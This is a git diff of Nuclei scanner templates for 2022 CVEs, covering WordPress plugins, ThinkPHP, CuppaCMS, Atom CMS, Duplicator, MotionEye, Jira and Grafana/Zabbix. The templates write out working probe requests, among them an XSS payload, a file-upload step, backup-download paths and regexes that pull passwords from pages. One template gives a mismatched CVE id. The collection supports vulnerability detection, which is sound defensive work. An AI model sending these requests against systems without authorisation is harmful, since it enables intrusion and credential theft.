- verified: "true" - tags: cve,all-in-one-wp-migration,authenticated,wpscan,cve2022,wordpress,wp-plugin,wp,xss + verified: true + max-request: 3 + vendor: servmask + product: all-in-one_wp_migration + framework: wordpress + tags: cve,cve2022,all-in-one-wp-migration,authenticated,wpscan,wordpress,wp-plugin,wp,xss,servmask -requests: +http: - raw: - | POST /wp-login.php HTTP/1.1 @@ -28,21 +40,17 @@ requests: Content-Type: application/x-www-form-urlencoded log={{username}}&pwd={{password}}&wp-submit=Log+In - - | GET /wp-admin/admin.php?page=ai1wm_export HTTP/1.1 Host: {{Hostname}} - - | GET /wp-admin/admin-ajax.php?action=ai1wm_export&ai1wm_import=1&options%5Breplace%5D%5Bnew_value%5D%5B%5D=XSSPAYLOAD%3Csvg+onload=alert(document.domain)%3E&ai1wm_manual_export=1&secret_key={{secretkey}} HTTP/1.1 Host: {{Hostname}} - cookie-reuse: true - req-condition: true matchers: - type: dsl dsl: - - contains(all_headers_3, "text/html") + - contains(header_3, "text/html") - status_code_3 == 200 - contains(body_3, '{\"new_value\":[\"XSSPAYLOAD') condition: and @@ -54,5 +62,4 @@ requests: regex: - 'ai1wm_feedback"},"secret_key":"([0-9a-zA-Z]+)"' internal: true - -# Enhanced by mp on 2022/10/05 +# digest: 4b0a00483046022100b7d06ce856a168a95b454d4325f60f812325ac99d80ba9a9b145c641a5457c16022100c7ea3daf3be143b3953ed74dea7edd703e5b7825a231fba31a84de3c93d919c6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-25481.yaml b/nuclei-templates/CVE-2022/CVE-2022-25481.yaml index a8d5154ea3..98eb3f6fa7 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-25481.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-25481.yaml @@ -6,20 +6,33 @@ info: severity: high description: | ThinkPHP 5.0.24 is susceptible to information disclosure. This version was configured without the PATHINFO parameter. This can allow an attacker to access all system environment parameters from index.php, thereby possibly obtaining sensitive information, modifying data, and/or executing unauthorized operations. + impact: | + An attacker can exploit this vulnerability to gain sensitive information. + remediation: | + Upgrade to a patched version of ThinkPHP or apply the necessary security patches. reference: - https://github.com/Lyther/VulnDiscover/blob/master/Web/ThinkPHP_InfoLeak.md - https://nvd.nist.gov/vuln/detail/CVE-2022-25481 + - https://github.com/20142995/sectool + - https://github.com/ARPSyndicate/cvemon + - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2022-25481 cwe-id: CWE-668 + epss-score: 0.01261 + epss-percentile: 0.85321 + cpe: cpe:2.3:a:thinkphp:thinkphp:5.0.24:*:*:*:*:*:*:* metadata: + verified: true + max-request: 1 + vendor: thinkphp + product: thinkphp shodan-query: title:"ThinkPHP" - verified: "true" tags: cve,cve2022,thinkphp,exposure,oss -requests: +http: - method: GET path: - '{{BaseURL}}/index.php?s=example' @@ -27,17 +40,17 @@ requests: matchers-condition: and matchers: - type: word + part: body words: - - "ThinkPHP" - - - type: word - words: - - "HttpException" - - "TRACE" - condition: or + - "Exception" + - "REQUEST_TIME" + - "ThinkPHP Constants" + condition: and - type: status status: + - 200 + - 500 - 404 - -# Enhanced by md on 2023/02/03 + condition: or +# digest: 4a0a004730450220152a665e7b3a3c19077e3bf8a9d5f588afd66692737ed127dea8c823f9a1dd04022100d65ce7ec17220bbd6cfd2f3278886cd52b2f34beaae8509405bcfd1affd9940f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-25485.yaml b/nuclei-templates/CVE-2022/CVE-2022-25485.yaml index b508954d69..655d49991d 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-25485.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-25485.yaml @@ -6,25 +6,28 @@ info: severity: high description: | CuppaCMS v1.0 was discovered to contain a local file inclusion via the url parameter in /alerts/alertLightbox.php. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files, remote code execution, and potential compromise of the entire system. remediation: | Upgrade to the latest version of Cuppa CMS or apply the vendor-provided patch to fix the LFI vulnerability. reference: - https://github.com/CuppaCMS/CuppaCMS - https://nvd.nist.gov/vuln/detail/CVE-2022-25485 + - https://github.com/ARPSyndicate/cvemon classification: cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H cvss-score: 7.8 cve-id: CVE-2022-25485 cwe-id: CWE-829 epss-score: 0.00648 - epss-percentile: 0.77011 + epss-percentile: 0.78876 cpe: cpe:2.3:a:cuppacms:cuppacms:1.0:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: cuppacms product: cuppacms - tags: cve,cve2022,lfi,cuppa + tags: cve,cve2022,lfi,cuppa,cuppacms http: - raw: @@ -44,4 +47,4 @@ http: - type: status status: - 200 -# digest: 490a004630440220569acdf64fb43a458ea70830e8af110bd0511da283c468c26032f3644918a251022058e8369ec64ae1526c9d2f04581fc8e70449de2aeb8543879a63cb7989c2310c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220695bf0015ba99c93acd63afca4128b2148ff5a27a7932b4643c859aeb61a42c4022044e70aebbbea707f05244a3f7616eaf4faf0449294f9689bcfc0fffc730fb702:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-25486.yaml b/nuclei-templates/CVE-2022/CVE-2022-25486.yaml index 3b954228f2..7c0e1a6919 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-25486.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-25486.yaml @@ -6,6 +6,8 @@ info: severity: high description: | CuppaCMS v1.0 was discovered to contain a local file inclusion via the url parameter in /alerts/alertConfigField.php. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access, sensitive information disclosure, and potential remote code execution. remediation: | Upgrade to the latest version of Cuppa CMS or apply the provided patch to fix the LFI vulnerability. reference: @@ -17,14 +19,14 @@ info: cve-id: CVE-2022-25486 cwe-id: CWE-829 epss-score: 0.01775 - epss-percentile: 0.8663 + epss-percentile: 0.8667 cpe: cpe:2.3:a:cuppacms:cuppacms:1.0:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: cuppacms product: cuppacms - tags: cve,cve2022,lfi,cuppa + tags: cve,cve2022,lfi,cuppa,cuppacms http: - raw: @@ -44,4 +46,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022052a39ab7f71484097704ee4d86f7dd9429ce4f99ae1528bc96ac3379eae36e2402203c2f7671bb11ba721aaef6f31e8488e167de9a97d91eded69e2c9f72595d5c78:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100d9af1a8a2a7a6a3c65fffdd36d187033e9d8f9359c5ba7fbdf1c7e7522ab3a7c02200b66649c50c196fe79d3fd5010175cc3440562f4bb473c24296993c71c05f7d4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-25487.yaml b/nuclei-templates/CVE-2022/CVE-2022-25487.yaml index 662378abb9..5fe7a52c5e 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-25487.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-25487.yaml @@ -6,25 +6,32 @@ info: severity: critical description: | Atom CMS v2.0 was discovered to contain a remote code execution (RCE) vulnerability via /admin/uploads.php. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system. remediation: Fixed in version Atom CMS v2.1 reference: - https://packetstormsecurity.com/files/166532/Atom-CMS-1.0.2-Shell-Upload.html - https://github.com/thedigicraft/Atom.CMS/issues/256 - https://nvd.nist.gov/vuln/detail/CVE-2022-25487 + - https://github.com/ARPSyndicate/cvemon + - https://github.com/shikari00007/Atom-CMS-2.0---File-Upload-Remote-Code-Execution-Un-Authenticated-POC classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2022-25487 cwe-id: CWE-434 - epss-score: 0.88802 - epss-percentile: 0.98414 + epss-score: 0.84615 + epss-percentile: 0.98422 cpe: cpe:2.3:a:thedigitalcraft:atomcms:2.0:*:*:*:*:*:*:* metadata: verified: true max-request: 2 vendor: thedigitalcraft product: atomcms - tags: cve,cve2022,rce,atom,cms,unauth,packetstorm,intrusive + tags: cve2022,cve,rce,atom,cms,unauth,packetstorm,intrusive,thedigitalcraft,fielupload + +variables: + string: "CVE-2022-25487" http: - raw: @@ -42,7 +49,7 @@ http: Content-Type: image/jpeg - + -----------------------------30623082103363803402542706041-- - | GET /uploads/{{filename}} HTTP/1.1 @@ -53,16 +60,7 @@ http: - type: word part: body words: - - 7ee3686858eb89dd68ccf85f0ea03abe - - - type: word - part: header - words: - - text/html - - - type: status - status: - - 200 + - '{{md5(string)}}' extractors: - type: regex @@ -71,4 +69,4 @@ http: regex: - SET avatar = '(.*?)' internal: true -# digest: 490a0046304402205f0e1b05a022e94ca8828221c462990afcbac3f03d3b8c39f458f6a2441fb4c10220075e62f2bd3a5fa8bf4be5e1eadc9f7e20c86d43cba26f0ff1df6c3874281fad:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 480a00453043022053b2e71d759824bf37ef2cafa971723f16645d2288e9f56f34337b2cc04e3522021f2d387dd0cd19bc32b46742661ac827c6e9f2781f7ee711c0df141fc4303737:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-25488.yaml b/nuclei-templates/CVE-2022/CVE-2022-25488.yaml index ec3069ff9f..83ddbb55db 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-25488.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-25488.yaml @@ -6,24 +6,28 @@ info: severity: critical description: | Atom CMS v2.0 was discovered to contain a SQL injection vulnerability via the id parameter in /admin/ajax/avatar.php. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation. remediation: Fixed in version Atom CMS v2.1 reference: - https://github.com/thedigicraft/Atom.CMS/issues/257 - https://nvd.nist.gov/vuln/detail/CVE-2022-25488 + - https://github.com/ARPSyndicate/cvemon + - https://github.com/superlink996/chunqiuyunjingbachang classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2022-25488 cwe-id: CWE-89 - epss-score: 0.02036 - epss-percentile: 0.87693 + epss-score: 0.0161 + epss-percentile: 0.87161 cpe: cpe:2.3:a:thedigitalcraft:atomcms:2.0:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: thedigitalcraft product: atomcms - tags: cve,cve2022,sqli,atom,cms + tags: cve,cve2022,sqli,atom,cms,thedigitalcraft variables: num: "999999999" @@ -44,4 +48,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022035d33e7f4baeabdbdc1f120d2e674694faa2bc32cba506f3ce0c8de89ed252420221008de4f56272b96667e097fe952e44d3985049063f1658186267849178367170b1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100a73c8ca0b49194b5bc99ad324b86286411cb6049ef9f136a9fe942a263d7510202205b6306efb5f7d90e7308cce0f917fa4153db6c0fefd0f487f526ed0ce2b1ab04:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-25489.yaml b/nuclei-templates/CVE-2022/CVE-2022-25489.yaml index eca4811d32..65ad5f3dce 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-25489.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-25489.yaml @@ -6,24 +6,27 @@ info: severity: medium description: | Atom CMS v2.0 was discovered to contain a reflected cross-site scripting (XSS) vulnerability via the "A" parameter in /widgets/debug.php. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement. remediation: Fixed in version Atom CMS v2.1 reference: - https://github.com/thedigicraft/Atom.CMS/issues/258 - https://nvd.nist.gov/vuln/detail/CVE-2022-25489 + - https://github.com/ARPSyndicate/cvemon classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N cvss-score: 5.4 cve-id: CVE-2022-25489 cwe-id: CWE-79 - epss-score: 0.00782 - epss-percentile: 0.79366 + epss-score: 0.00134 + epss-percentile: 0.47681 cpe: cpe:2.3:a:thedigitalcraft:atomcms:2.0:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: thedigitalcraft product: atomcms - tags: cve,cve2022,xss,atom,cms + tags: cve,cve2022,xss,atom,cms,thedigitalcraft http: - method: GET @@ -48,4 +51,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502200ae2bc90f0b9a28b0fb5f42a6f1b6330f3c0eefacb958b440bf9d8839682d0f3022100c859d69d9567a9421bcfc1a31e5a6a15bff5e1f8a9e009af740b6c984d30e92c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100ba616440a48cd79fed0fbb82c74d5b423c176fb2058b2a6e108042d3b7e3f6860220327a46e6573a290031f738c2c771cfdb4e8d33eafa4d6bacb46ae741a85abac2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-25497.yaml b/nuclei-templates/CVE-2022/CVE-2022-25497.yaml index 019cb90d21..e52fbf3495 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-25497.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-25497.yaml @@ -6,25 +6,28 @@ info: severity: medium description: | CuppaCMS v1.0 was discovered to contain an arbitrary file read via the copy function. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access, sensitive information disclosure, and potential remote code execution. remediation: | Upgrade to the latest version of Cuppa CMS or apply the provided patch to fix the LFI vulnerability. reference: - https://github.com/CuppaCMS/CuppaCMS - https://nvd.nist.gov/vuln/detail/CVE-2022-25497 + - https://github.com/ARPSyndicate/cvemon classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N cvss-score: 5.3 cve-id: CVE-2022-25497 cwe-id: CWE-552 - epss-score: 0.00582 - epss-percentile: 0.75622 + epss-score: 0.00508 + epss-percentile: 0.76089 cpe: cpe:2.3:a:cuppacms:cuppacms:1.0:*:*:*:*:*:*:* metadata: verified: true max-request: 2 vendor: cuppacms product: cuppacms - tags: cve,cve2022,lfi,cuppa,intrusive + tags: cve,cve2022,lfi,cuppa,intrusive,cuppacms http: - raw: @@ -52,4 +55,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100bbddf761c7b8044f749b1733ebb39ac5b3913dbed94f657270ca9f86d188682f02200f423e4a9e91a9534d8d837797bc5a926178eff2d1753aed56484c04f328d400:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402200e86958e748c94fb8894ce5d8e4ffb93f8142bb6942eda24333c6c89421e8ce00220055ccece3bbea309d872f93ae879a2c5d76a3cac9162862159898803a6a7f9bb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-2551.yaml b/nuclei-templates/CVE-2022/CVE-2022-2551.yaml index 8a9ec17442..5f74137a15 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-2551.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-2551.yaml @@ -1,29 +1,38 @@ id: CVE-2022-2551 info: - name: Duplicator < 1.4.7 - Unauthenticated Backup Download + name: WordPress Duplicator <1.4.7 - Authentication Bypass author: LRTK-CODER severity: high description: | - The Duplicator WordPress plugin before 1.4.7 discloses the url of the a backup to unauthenticated visitors accessing the main installer endpoint of the plugin, if the installer script has been run once by an administrator, allowing download of the full site backup without authenticating. + WordPress Duplicator plugin before 1.4.7 is susceptible to authentication bypass. The plugin discloses the URL of the backup to unauthenticated visitors accessing the main installer endpoint. If the installer script has been run once by an administrator, this allows download of the full site backup without proper authentication. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access to sensitive information or unauthorized actions on the affected WordPress site. + remediation: Fixed in version 1.4.7.1. reference: - https://wpscan.com/vulnerability/f27d753e-861a-4d8d-9b9a-6c99a8a7ebe0 - https://wordpress.org/plugins/duplicator/ - - https://nvd.nist.gov/vuln/detail/CVE-2022-2551 - - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2551 - https://github.com/SecuriTrust/CVEsLab/tree/main/CVE-2022-2551 - remediation: Fixed in version 1.4.7.1 + - https://nvd.nist.gov/vuln/detail/CVE-2022-2551 + - https://github.com/ARPSyndicate/cvemon classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2022-2551 cwe-id: CWE-425 + epss-score: 0.72442 + epss-percentile: 0.97997 + cpe: cpe:2.3:a:snapcreek:duplicator:*:*:*:*:lite:wordpress:*:* metadata: + verified: true + max-request: 2 + vendor: snapcreek + product: duplicator + framework: wordpress google-query: inurl:/backups-dup-lite/dup-installer/ - verified: "true" - tags: cve2022,wordpress,wp,wp-plugin,duplicator,wpscan,cve + tags: cve2022,cve,wordpress,wp,wp-plugin,duplicator,wpscan,snapcreek -requests: +http: - method: GET path: - "{{BaseURL}}/wp-content/backups-dup-lite/dup-installer/main.installer.php?is_daws=1" @@ -31,11 +40,11 @@ requests: matchers-condition: and matchers: - - condition: and - type: word + - type: word part: body words: - "restart this install process" + condition: and - type: word part: header @@ -45,3 +54,4 @@ requests: - type: status status: - 200 +# digest: 4a0a00473045022058b2345a7931d57a2c005b13d6444c706fd67511a9cfd652adc58a44381d1dd4022100a9b711eeffbbf37010a1f9ac104d9745baab70e7beb8354db4179e48762fd500:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-25568.yaml b/nuclei-templates/CVE-2022/CVE-2022-25568.yaml new file mode 100644 index 0000000000..69e144b774 --- /dev/null +++ b/nuclei-templates/CVE-2022/CVE-2022-25568.yaml @@ -0,0 +1,51 @@ +id: CVE-2022-25568 + +info: + name: MotionEye Config Info Disclosure + author: DhiyaneshDK + severity: high + description: | + MotionEye v0.42.1 and below allows attackers to access sensitive information via a GET request to /config/list. To exploit this vulnerability, a regular user password must be unconfigured. + reference: + - https://www.pizzapower.me/2022/02/17/motioneye-config-info-disclosure/ + - https://github.com/ccrisan/motioneye/issues/2292 + - https://nvd.nist.gov/vuln/detail/cve-2022-25568 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2022-25568 + cwe-id: CWE-1188 + epss-score: 0.01838 + epss-percentile: 0.86962 + cpe: cpe:2.3:a:motioneye_project:motioneye:*:*:*:*:*:*:*:* + metadata: + verified: true + max-request: 1 + vendor: motioneye_project + product: motioneye + shodan-query: html:"MotionEye" + tags: cve,cve2022,motioneye,config,motioneye_project + +http: + - method: GET + path: + - "{{BaseURL}}/config/list" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "upload_password" + - "network_password" + condition: and + + - type: word + part: header + words: + - "application/json" + + - type: status + status: + - 200 +# digest: 4a0a00473045022100c0eb31344ab3448d9fd654d7f0e2b8986db5171ee7fc2614b030cda3446cbcd70220546b8923bf2af5f8e75906a0e4b482a48b43d49e5bd90af2be8c05d0b606f05e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-2599.yaml b/nuclei-templates/CVE-2022/CVE-2022-2599.yaml index 5b32692220..9c2c7a2a42 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-2599.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-2599.yaml @@ -6,19 +6,22 @@ info: severity: medium description: | WordPress Anti-Malware Security and Brute-Force Firewall plugin before 4.21.83 contains a cross-site scripting vulnerability. The plugin does not sanitize and escape some parameters before outputting them back in an admin dashboard. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into the targeted WordPress site, potentially leading to unauthorized access, data theft, or further attacks. remediation: | Update the WordPress Anti-Malware Security and Brute-Force Firewall plugin to version 4.21.83 or later to mitigate the vulnerability. reference: - https://wpscan.com/vulnerability/276a7fc5-3d0d-446d-92cf-20060aecd0ef - https://wordpress.org/plugins/gotmls/advanced/ - https://nvd.nist.gov/vuln/detail/CVE-2022-2599 + - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2022-2599 cwe-id: CWE-79 - epss-score: 0.00119 - epss-percentile: 0.45913 + epss-score: 0.00106 + epss-percentile: 0.42122 cpe: cpe:2.3:a:anti-malware_security_and_brute-force_firewall_project:anti-malware_security_and_brute-force_firewall:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -26,7 +29,7 @@ info: vendor: anti-malware_security_and_brute-force_firewall_project product: anti-malware_security_and_brute-force_firewall framework: wordpress - tags: wordpress,wp-plugin,xss,gotmls,authenticated,wpscan,cve,cve2022 + tags: cve,cve2022,wordpress,wp-plugin,xss,gotmls,authenticated,wpscan http: - raw: @@ -57,4 +60,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100d457426c06f899a2fb4822616814c65f2feab42c2981ae5f4fa856d568d6d0f002207f3ded46e15b2ddc61d09d3e703e6945069fa899be5fafb841c060f1aadf86b1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100afd7ffdc412d5cbffebb6acdf1850cbcc2f20ebe9e9b5e56d2573c3e144242fb022100c25d1c6e7cdb06d86355391d4e7fe15b393dc72e717e0c1b998da4bfc729663a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-26135.yaml b/nuclei-templates/CVE-2022/CVE-2022-26135.yaml new file mode 100644 index 0000000000..f24f3f1cf7 --- /dev/null +++ b/nuclei-templates/CVE-2022/CVE-2022-26135.yaml @@ -0,0 +1,28 @@ +id: CVE-2022-26135 +info: + name: Full-Read Server Side Request Forgery in Mobile Plugin for Jira Data Center and Server + author: dk4trin + severity: high + description: A vulnerability in Mobile Plugin for Jira Data Center and Server allows a remote, authenticated user (including a user who joined via the sign-up feature) to perform a full read server-side request forgery via a batch endpoint. This affects Atlassian Jira Server and Data Center from version 8.0.0 before version 8.13.22, from version 8.14.0 before 8.20.10, from version 8.21.0 before 8.22.4. This also affects Jira Management Server and Data Center versions from version 4.0.0 before 4.13.22, from version 4.14.0 before 4.20.10 and from version 4.21.0 before 4.22.4. + reference: + - https://confluence.atlassian.com/jira/jira-server-security-advisory-29nd-june-2022-1142430667.html + - https://github.com/assetnote/jira-mobile-ssrf-exploit + classification: + cvss-score: 7.5 + cve-id: CVE-2020-14179 + tags: cve,cve2022,atlassian,jira,ssrf +requests: + - method: GET + path: + - "{{BaseURL}}/secure/Signup!default.jspa" + matchers-condition: and + matchers: + - type: word + words: + - "Email" + - "Username" + - "Password" + condition: and + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2022/CVE-2022-26148.yaml b/nuclei-templates/CVE-2022/CVE-2022-26148.yaml index edf32a34c5..da8a297eb5 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-26148.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-26148.yaml @@ -1,36 +1,44 @@ id: CVE-2022-26148 info: - name: Grafana Zabbix Integration - Credential Disclosure + name: Grafana & Zabbix Integration - Credentials Disclosure author: Geekby severity: critical - description: An issue was discovered in Grafana through 7.3.4, when integrated with Zabbix. The Zabbix password can be found in the api_jsonrpc.php HTML source code. When the user logs in and allows the user to register, one can right click to view the source code and use Ctrl-F to search for password in api_jsonrpc.php to discover the Zabbix account password and URL address. + description: | + Grafana through 7.3.4, when integrated with Zabbix, contains a credential disclosure vulnerability. The Zabbix password can be found in the api_jsonrpc.php HTML source code. When the user logs in and allows the user to register, one can right click to view the source code and use Ctrl-F to search for password in api_jsonrpc.php to discover the Zabbix account password and URL address. + impact: | + An attacker can obtain sensitive credentials, leading to unauthorized access and potential data breaches. + remediation: | + Update to the latest version of the Grafana & Zabbix Integration plugin to fix the vulnerability. reference: - - https://nvd.nist.gov/vuln/detail/CVE-2022-26148 - https://2k8.org/post-319.html + - https://security.netapp.com/advisory/ntap-20220425-0005/ + - https://nvd.nist.gov/vuln/detail/CVE-2022-26148 + - https://github.com/HimmelAward/Goby_POC + - https://github.com/Z0fhack/Goby_POC classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2022-26148 + cwe-id: CWE-312 + epss-score: 0.15727 + epss-percentile: 0.95795 + cpe: cpe:2.3:a:grafana:grafana:*:*:*:*:*:*:*:* metadata: - fofa-query: app="Grafana" + max-request: 1 + vendor: grafana + product: grafana shodan-query: title:"Grafana" - tags: cve,cve2022,grafana,zabbix + fofa-query: app="Grafana" + tags: cve,cve2022,grafana,zabbix,exposure -requests: +http: - method: GET path: - "{{BaseURL}}/login?redirect=%2F" matchers-condition: and matchers: - - type: regex - part: body - regex: - - '"password":"(.*?)"' - - '"username":"(.*?)"' - condition: and - - type: word part: body words: @@ -39,6 +47,13 @@ requests: - "alexanderzobnin-zabbix-datasource" condition: or + - type: regex + part: body + regex: + - '"password":"(.*?)"' + - '"username":"(.*?)"' + condition: and + - type: status status: - 200 @@ -49,4 +64,5 @@ requests: regex: - '"password":"(.*?)"' - '"username":"(.*?)"' - - '"url":"([a-z:/0-9.]+)\/api_jsonrpc\.php' \ No newline at end of file + - '"url":"([a-z:/0-9.]+)\/api_jsonrpc\.php' +# digest: 4a0a00473045022100b6eaad94ff3878067cbf35ebf2e98041d29ea00cd548a6acc1cebf8170545ff5022011109ec67dc75367e14a57c39726ee1cd3150458963d5a36b4ea0a51e0b68769:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-26159.yaml b/nuclei-templates/CVE-2022/CVE-2022-26159.yaml index 5ad8567611..0b91d2fb85 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-26159.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-26159.yaml @@ -4,17 +4,32 @@ info: name: Ametys CMS Information Disclosure author: Remi Gascou (podalirius) severity: medium - description: "Ametys CMS before 4.5.0 allows a remote unauthenticated attacker to read documents such as plugins/web/service/search/auto-completion/domain/en.xml (and similar pathnames for other languages) via the auto-completion plugin, which contain all characters typed by all users, including the content of private pages. For example, a private page may contain usernames, e-mail addresses, and possibly passwords." + description: Ametys CMS before 4.5.0 allows a remote unauthenticated attacker to read documents such as plugins/web/service/search/auto-completion/domain/en.xml (and similar pathnames for other languages) via the auto-completion plugin, which contain all characters typed by all users, including the content of private pages. For example, a private page may contain usernames, e-mail addresses, and possibly passwords. + impact: | + The vulnerability can lead to the exposure of sensitive data, such as user credentials or system configuration. + remediation: | + Apply the latest security patches or updates provided by the vendor to fix the information disclosure vulnerability in Ametys CMS. reference: - https://nvd.nist.gov/vuln/detail/CVE-2022-26159 - https://podalirius.net/en/cves/2022-26159/ - tags: cve,cve2022,plugin,ametys,cms + - https://issues.ametys.org/browse/CMS-10973 + - https://github.com/p0dalirius/CVE-2022-26159-Ametys-Autocompletion-XML/ + - https://github.com/ARPSyndicate/cvemon classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N - cvss-score: 5.30 + cvss-score: 5.3 cve-id: CVE-2022-26159 + cwe-id: CWE-425 + epss-score: 0.00597 + epss-percentile: 0.76107 + cpe: cpe:2.3:a:ametys:ametys:*:*:*:*:*:*:*:* + metadata: + max-request: 1 + vendor: ametys + product: ametys + tags: cve,cve2022,plugin,ametys,cms -requests: +http: - method: GET path: - '{{BaseURL}}/plugins/web/service/search/auto-completion/domain/en.xml?q=adm' @@ -35,5 +50,4 @@ requests: - type: status status: - 200 - -# Enhanced by mp on 2022/03/23 +# digest: 4a0a00473045022100d8276e7109d2bd69d3ea42af14353f15d96864cf72e8e0effcef94a02a2a499b022032467aecf3198c0b7e34fa5664b2c75d91a03e94423d9d3168960d7a55e2bfa7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-26233.yaml b/nuclei-templates/CVE-2022/CVE-2022-26233.yaml deleted file mode 100644 index 85601b85f3..0000000000 --- a/nuclei-templates/CVE-2022/CVE-2022-26233.yaml +++ /dev/null @@ -1,37 +0,0 @@ -id: CVE-2022-26233 - -info: - name: Barco Control Room Management Suite <=2.9 Build 0275 - Local File Inclusion - author: 0x_Akoko - severity: high - description: Barco Control Room Management through Suite 2.9 Build 0275 is vulnerable to local file inclusion that could allow attackers to access sensitive information and components. Requests must begin with the "GET /..\.." substring. - reference: - - https://0day.today/exploit/37579 - - https://www.cvedetails.com/cve/CVE-2022-26233 - - http://seclists.org/fulldisclosure/2022/Apr/0 - - http://packetstormsecurity.com/files/166577/Barco-Control-Room-Management-Suite-Directory-Traversal.html - - https://nvd.nist.gov/vuln/detail/CVE-2022-26233 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.5 - cve-id: CVE-2022-26233 - cwe-id: CWE-22 - tags: 